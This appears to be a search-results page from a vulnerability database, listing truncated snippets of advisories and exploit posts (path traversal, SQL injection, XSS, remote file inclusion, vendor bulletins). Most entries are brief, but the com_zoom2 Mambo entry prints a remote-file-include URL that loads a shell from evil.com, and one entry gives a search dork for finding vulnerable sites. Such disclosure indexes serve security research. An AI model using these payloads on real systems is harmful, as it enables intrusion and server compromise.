Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2012/06/03 12:0 a.m.129 views

Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access

OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2012/02/14 12:0 a.m.129 views

D-Link DIR-601 TFTP Directory Traversal Vulnerability

Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2011/12/19 12:0 a.m.129 views

[RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass

Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details ======= Product: Owl Intranet...

Exploits0
securityvulns
securityvulns
added 2011/12/12 12:0 a.m.129 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

6.4CVSS1.6AI score0.01648EPSS
Exploits0References8Affected Software5
securityvulns
securityvulns
added 2011/10/04 12:0 a.m.129 views

Elastix PBX Extensions Enumeration

Exploit Title: Elastix PBX Extensions Enumeration Date: 1 Oct 2011 Author: Bassem Saleh Contact: Injectoratlivedotcom Software Link: http://www.elastix.org/ Version: 2.X and may be below versions Tested on: 2.0.3 ================================================================ Non privileges user...

1.7AI score
Exploits0
securityvulns
securityvulns
added 2011/08/27 12:0 a.m.129 views

OMNITEC (prodotto.php?id_prodotto) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability OMNITEC prodotto.php?idprodotto AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Persian Gulf 4 Ever! Dork : "design e realizzazione by OMNITEC" Exploite:...

4.2AI score
Exploits0
securityvulns
securityvulns
added 2011/08/10 12:0 a.m.129 views

[security bulletin] HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942411 Version: 1 HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access NOTICE: The information in this Security Bulletin should be acted up...

6.4CVSS0.8AI score0.02519EPSS
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.129 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/05/08 12:0 a.m.129 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits0
securityvulns
securityvulns
added 2010/12/14 12:0 a.m.129 views

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2010/12/12 12:0 a.m.129 views

www.eVuln.com : Non-persistent XSS in slickMsg

www.eVuln.com advisory: Non-persistent XSS in slickMsg Summary: http://evuln.com/vulns/159/summary.html Details: http://evuln.com/vulns/159/description.html -----------Summary----------- eVuln ID: EV0159 Software: slickMsg Version: 0.7-alpha Critical Level: low Type: Cross Site Scripting Status:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2010/08/03 12:0 a.m.129 views

Microsoft Windows shortcuts code execution

Code execution on shortcut icon displaying...

9.3CVSS2AI score0.91324EPSS
Exploits13References1Affected Software1
securityvulns
securityvulns
added 2009/11/17 12:0 a.m.129 views

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =============Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation================ Authors: Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry AT GMAIL DOT COM Website: http://evilcry.netsons.org...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2009/09/28 12:0 a.m.129 views

[ONSEC-09-012] UMI.CMS Hash based Captcha

ONSEC-09-012 UMI.CMS Hash based Captcha Цель: UMI CMS =2.7.3 Тип: Обход ограничений Угроза: Средняя Дата обнаружения: 15.07.2009 Дата оповещения разработчика: 15.07.2009 Дата выхода исправления: 03.09.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group onsec dot ru Описание: В модуле...

Exploits0
securityvulns
securityvulns
added 2009/06/16 12:0 a.m.129 views

Netgear DG632 Router Authentication Bypass Vulnerability

Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: [email protected] [email protected] Original URL: http://www.tomneaves.co.uk/NetgearDG632AuthenticationBypass.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG6...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2009/04/17 12:0 a.m.129 views

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

?php / Geeklog = 1.5.2 savepreferences/blocks remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if isset...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2008/06/25 12:0 a.m.129 views

Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities Advisory ID: cisco-sa-20080625-cucm Revision 1.0 For Public Release 2008 June 25 1600 UTC GMT...

7.8CVSS0.6AI score0.02454EPSS
Exploits2
securityvulns
securityvulns
added 2008/03/17 12:0 a.m.129 views

VLC highlander bug

The old buffer-overflow in the subtitles handled by VLC has not been fully patched in version 0.8.6e, in fact buffertext2 in ParseSSA is still unchecked: if sscanf s, "Dialogue: ^,,d:d:d.d,d:d:d.d,81920^rn", buffertext2, The funny thing is that my old proof-of-concept was built just to test this...

1.6AI score
Exploits0
securityvulns
securityvulns
added 2007/11/29 12:0 a.m.129 views

Liferay Enterprise Portal multiple XSS

Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2007/06/18 12:0 a.m.129 views

[email protected]

Application: fuzzylime Forum Web Site: http://forum.fuzzylime.co.uk/st/front/index/ Versions: 1.01b and below Platform: linux, windows, freebsd, sun Bug: Cross site Scripting XSS Fix Available: Yes Advisory File: http://www.secvsn.com/content/Advisories/sr-180607-fuzzy.html...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2007/04/17 12:0 a.m.129 views

DNS birthday attacks

DNS uses 2-bytes message identificator to prevent spoofing attack. The problem is if few same requests came in same time they are forwarded with different IDs from same UDP port. It increases chances to spoof reply so called birthdey effect: probability that among 60 randomely choosen persons the...

5CVSS2.6AI score0.08311EPSS
Exploits0References2
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.129 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/11/28 12:0 a.m.129 views

tar archiver directory traversal

Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/11/09 12:0 a.m.129 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/09/04 12:0 a.m.129 views

OpenLDAP privilege escalation

User with 'selfwrite' ACL parameter can modify any attributes...

3.8AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/08/21 12:0 a.m.129 views

mambo-phphop Product Scroller Module R.F.I

Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp Software: mambo-phphop Product Scroller Module Attack method: Remote File Inclusion Source: / Load the phpshop main parse code / requireonce...

2.3AI score
Exploits0
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.128 views

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...

6.5CVSS0.4AI score0.59312EPSS
Exploits7
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.128 views

ESA-2015-081: RSA BSAFE® Micro Edition Suite, Crypto-C Micro Edition, Crypto-J, SSL-J and SSL-C Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2015-081: RSA BSAFE® Micro Edition Suite, Crypto-C Micro Edition, Crypto-J, SSL-J and SSL-C Multiple Vulnerabilities EMC Identifier: ESA-2015-081 CVE Identifier: CVE-2015-0533, CVE-2015-0534, CVE-2015-0535, CVE-2015-0536, CVE-2015-0537 Severity...

7.5CVSS1AI score0.98685EPSS
Exploits3
securityvulns
securityvulns
added 2014/09/21 12:0 a.m.128 views

APPLE-SA-2014-09-17-2 Apple TV 7

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-09-17-2 Apple TV 7 Apple TV 7 is now available and addresses the following: Apple TV Available for: Apple TV 3rd generation and later Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi...

9.3CVSS0.3AI score0.49049EPSS
Exploits9
securityvulns
securityvulns
added 2014/06/26 12:0 a.m.128 views

[USN-2253-1] LibreOffice vulnerability

========================================================================== Ubuntu Security Notice USN-2253-1 June 23, 2014 libreoffice vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

10CVSS1AI score0.03922EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.128 views

CVE-2014-0372 - SQL Injection in Oracle Demantra

Vulnerability title: SQL Injection in Oracle Demantra CVE: CVE-2014-0372 Vendor: Oracle Product: Demantra Affected version: 12.2.1 Fixed version: 12.2.3 Reported by: Oliver Gruskovnjak Details: The Oracle Demantra application is vulnerable to SQL injection. An attacker with access to the vulnerab...

5.5CVSS0.1AI score0.08762EPSS
Exploits2
securityvulns
securityvulns
added 2013/08/28 12:0 a.m.128 views

[ MDVSA-2013:216 ] perl-Proc-ProcessTable

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2013:216 http://www.mandriva.com/en/support/security/ Package : perl-Proc-ProcessTable Date : August 23, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 Problem Description: Updated perl-Proc-ProcessTab...

2.6CVSS5.7AI score0.00303EPSS
Exploits0
securityvulns
securityvulns
added 2013/02/18 12:0 a.m.128 views

[USN-1722-1] jQuery vulnerability

========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

4.3CVSS0.2AI score0.19191EPSS
Exploits1
securityvulns
securityvulns
added 2012/11/02 12:0 a.m.128 views

XSS in dokeos 2.1.1

Exploit Title : Dokeos 2.1.1 Multiple Cross-Site Scripting Vulnerabilities Author:Marcela Benetrix home:www.girlinthemiddle.net Date: 10/17/12 version: 2.1.1 software link:www.dokeos.com Dokeos description Dokeos is an open source e-learning platform programmed in PHP, Javascript and HTML which...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2012/06/03 12:0 a.m.128 views

Acuity CMS 2.6.x <= Arbitrary File Upload

OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity...

1.3AI score
Exploits0
securityvulns
securityvulns
added 2012/02/03 12:0 a.m.128 views

[Announce] Apache HTTP Server 2.2.22 Released

Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...

5CVSS0.90734EPSS
Exploits23
securityvulns
securityvulns
added 2012/01/21 12:0 a.m.128 views

[PT-2011-01] Cross-Site Scripting in Kayako Support Suite

------------------------------------------------------------------ PT-2011-01 Positive Technologies Security Advisory Cross-Site Scripting in Kayako Support Suite ------------------------------------------------------------------ --- Vulnerable software Kayako Support Suite Version: 3.70.02-stabl...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2012/01/09 12:0 a.m.128 views

Multiple vulnerabilities in ImpressCMS

Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...

6.7AI score
Exploits0
securityvulns
securityvulns
added 2011/11/27 12:0 a.m.128 views

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 Published: 2011/11/16 Version 1.0 Affected products: iTop version 1.1.181, 1.2.0-RC-282 maybe earlier versions as well http://sourceforge.net/projects/itop/ References: CVE-2011-4275 - Multiple web-vulnerabilities in iTop...

4.3CVSS5.5AI score0.01624EPSS
Exploits2
securityvulns
securityvulns
added 2011/10/16 12:0 a.m.128 views

APPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006 OS X Lion v10.7.2 and Security Update 2011-006 is now available and addresses the following: Apache Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 and...

9.3CVSS0.3AI score0.98945EPSS
Exploits79
securityvulns
securityvulns
added 2011/04/11 12:0 a.m.128 views

Sonexis ConferenceManager SQL Injection

Vulnerability title: Sonexis ConferenceManager SQL Injection Solutionary ID: SERT-VDN-1006 Solutionary disclosure URL: http://www.solutionary.com/index/SERT/Vuln-Disclosures/Sonexis-SQL-Injection.html CVE ID: Pending CVSS risk rating: 8 Product: Sonexis ConferenceManager Application Vendor: Sonex...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2009/08/07 12:0 a.m.128 views

Mozilla Foundation Security Advisory 2009-38

Mozilla Foundation Security Advisory 2009-38 Title: Data corruption with SOCKS5 reply containing DNS name longer than 15 characters Impact: Low Announced: July 21, 2009 Reporter: Andrej Andolsek Products: Firefox Fixed in: Firefox 3.5.2 Firefox 3.0.12 Description Andrej Andolsek reported that whe...

5CVSS1AI score0.01991EPSS
Exploits0
securityvulns
securityvulns
added 2009/07/16 12:0 a.m.128 views

[oCERT-2009-010] mimeTeX and mathTeX buffer overflows and command injection

2009-010 mimeTeX and mathTeX buffer overflows and command injection Description: The mimeTeX and mathTeX CGIs are widely used helper executables that allow mathematical equation rendering in the form of images. Both applications suffer from several buffer overflows as well as command injection...

10CVSS0.5AI score0.09024EPSS
Exploits1
securityvulns
securityvulns
added 2009/07/03 12:0 a.m.128 views

[oCERT-2009-007] FCKeditor input sanitization errors

2009-007 FCKeditor input sanitization errors Description: FCKeditor, a web based open source HTML text editor, suffers from a remote file upload vulnerability. The input of several connector modules is not properly verified before being used, this leads to exposure of the contents of arbitrary...

7.5CVSS0.6AI score0.83865EPSS
Exploits10
securityvulns
securityvulns
added 2009/02/07 12:0 a.m.128 views

RealPlayer multiple security vulnerabilities

Multiple vulnerabilities on IVR format parsing...

9.3CVSS3AI score0.08101EPSS
Exploits1References2Affected Software1
securityvulns
securityvulns
added 2008/10/24 12:0 a.m.128 views

US-CERT Technical Cyber Security Alert TA08-297A -- Microsoft Windows Server Service RPC Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA08-297A Microsoft Windows Server Service RPC Vulnerability Original release date: October 23, 2008 Last revised: -- Source: US-CERT Systems Affected Microsoft Windows 2000 Microsoft Windows ...

10CVSS9.7AI score0.98751EPSS
Exploits12
securityvulns
securityvulns
added 2008/06/05 12:0 a.m.128 views

SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

======================================================= SMEweb 1.4b SQL/XSS Multiple Remote Vulnerabilities ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2007/12/12 12:0 a.m.128 views

ZDI-07-074: Microsoft Internet Explorer Node Manipulation Memory Corruption

ZDI-07-074: Microsoft Internet Explorer Node Manipulation Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-074.html December 11, 2007 -- CVE ID: CVE-2007-3903 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 Internet Explorer 7 --...

6.8CVSS0.9AI score0.31275EPSS
Exploits0
securityvulns
securityvulns
added 2007/11/14 12:0 a.m.128 views

[Full-disclosure] Predictable DNS transaction IDs in Microsoft DNS Server

1 Summary Affected software: Microsoft Windows 2003 SP2, Microsoft Windows 2000 SP4 Server Vendor URL: www.microsoft.com Severity: Medium References: Microsoft Security Bulletin MS07-062, CVE-2007-3898 2 Vulnerability Description Microsoft DNS server generates predictable DNS transaction IDs. If...

6.4CVSS0.6AI score0.55127EPSS
Exploits2
securityvulns
securityvulns
added 2007/11/12 12:0 a.m.128 views

Web Mayhem: Firefox’s JAR: Protocol issues

Web Mayhem: Firefox’s JAR: Protocol issues published: November 7th, 2007 One of the things that we enjoy the most, here in GNUCITIZEN, is finding issues with features. Unlike bugs, insecure features tend to be more severe and usually last longer due to uneasy and rather long decision making proce...

5.9AI score
Exploits0
Total number of security vulnerabilities5000